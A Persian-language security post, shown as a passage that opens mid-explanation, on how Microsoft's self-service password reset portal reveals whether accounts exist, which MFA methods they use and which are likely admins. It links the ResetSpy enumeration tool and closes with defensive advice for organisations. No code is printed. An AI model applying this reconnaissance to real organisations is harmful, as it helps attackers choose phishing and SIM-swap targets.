اگه حساب وجود نداشته باشه، فوری برمیگردی به صفحهٔ اول. اگه وجود داشته باشه، حتی اگه بازیابی رمز براش فعال نباشه، یه پیام دیگه میبینی. یعنی فقط با امتحان کردن ایمیلها (مثلاً از لینکدین یا سایت شرکت) میشه فهمید کدومها واقعیان — بدون اینکه هیچ رمزی امتحان کنی.
۲️⃣ چه روشهای امنیتیای براش ثبت شده
اگه بازیابی فعال باشه، صفحه نشون میده اون آدم رمزش رو با پیامک بازیابی میکنه، با اپ احرازهویت، یا با یه ایمیل دیگه. این خیلی مهمه چون:
کسی که فقط با «ایمیل جایگزین» محافظت شده = هدف ضعیف
کسی که با اپ احرازهویت (مثل Authenticator) محافظت شده = هدف سختتر
۳️⃣ آیا حساب ادمینه یا نه 🎯
نکتهٔ جالب: مایکروسافت بازیابی رمز رو برای حسابهای ادمین همیشه فعال نگه میداره، حتی اگه کل سازمان این قابلیت رو خاموش کرده باشه. پس اگه یه سازمان SSPR رو برای کاربران عادی بسته باشه ولی یه حساب هنوز جواب بده، تقریباً مطمئنی که اون حساب ادمینه!
⚠️ چرا مهمه؟
یه مهاجم با این تکنیک میتونه بدون هیچ حملهای:
فهرست ایمیلهای حدسی رو تبدیل کنه به لیست حسابهای تأییدشده
بفهمه کدوم حسابها امنیت ضعیف دارن (هدف اول برای فیشینگ)
حسابهای ادمین رو شناسایی کنه
روش دقیق حمله رو متناسب با نوع MFA انتخاب کنه (مثلاً برای SMS بره سراغ سیمسواپ)
جالبه که قبلاً یه کپچا جلوی این صفحه بود ولی از اوت ۲۰۲۶ مایکروسافت حذفش کرد و فقط محدودیت نرخ درخواست گذاشت.
محققها حتی یه ابزار پایتون به اسم ResetSpy ساختن که این کار رو خودکار میکنه و روی گیتهاب هم منتشرشه.
🛡 راهحل برای سازمانها
بازیابی رمز رو فقط برای گروه خاصی فعال کنید، نه همه
روشهای ضعیف (ایمیل جایگزین، سؤال امنیتی) رو حذف کنید و فقط اپ احرازهویت/تلفن بذارید
برای حسابهای ادمین از MFA مقاوم در برابر فیشینگ (مثل کلید امنیتی FIDO2) استفاده کنید
لاگهای Entra ID رو برای الگوهای عجیب (چک کردن پشتسرهم چند ایمیل) پایش کنید
ابزاری که توسعه داده شده : https://github.com/mlcsec/ResetSpy
توضیحات کامل : https://www.levelblue.com/blogs/spiderlabs-blog/enumerating-users-and-mfa-via-microsofts-password-reset-portal
GitHub
GitHub - mlcsec/ResetSpy: Enumerate user accounts and registered authentication methods via the Microsoft Self-Service Password…
Enumerate user accounts and registered authentication methods via the Microsoft Self-Service Password Reset (SSPR) portal - mlcsec/ResetSpy